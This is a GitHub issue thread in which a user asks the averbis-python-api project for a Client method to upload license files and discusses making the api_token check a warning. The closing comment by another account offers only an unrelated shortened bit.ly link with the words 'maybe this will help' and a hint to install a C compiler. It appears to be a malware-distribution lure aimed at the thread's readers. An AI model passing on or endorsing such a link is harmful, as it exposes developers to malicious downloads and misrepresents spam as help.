### ISSUE TITLE
Add endpoint for uploading license file

### ISSUE THREAD

**Issue by DavidHuebner** [averbis/averbis-python-api#161]
**Is your feature request related to a problem? Please describe.**
Currently, license file upload is done by a `curl` request as described in the [Averbis Support To Import License File](https://help.averbis.com/health-discovery/docs/quickstart/import-license-file). 

**Describe the solution you'd like**
I would like to see a new endpoint on `Client` level that allows the user to upload the license file to simplify this upload, something like 
```py
client = Client("url_to_health_discovery/health-discovery/")
client.upload_license(license_path: Path)
```

There is one problem we need to deal with, namely that no API Token is required to upload the license, but we currently check that an `api_token` is set when initializing the client (see https://github.com/averbis/averbis-python-api/blob/main/averbis/core/_rest_client.py#L1714). One option is to change this `Exception` to a warning so that we can intentionally initialize a `Client` without `api_token`. 

**Describe alternatives you've considered**
Add a standalone function `upload_license`, but this will be hard to find and we cannot use existing logic to send/parse requests.

**Additional context**
License files are required from HD 7.4 onwards.

**Comment by Kami-prog** [comment]
maybe this will help
https://bit.ly/4evXrQ6

you may need to install the c compiler
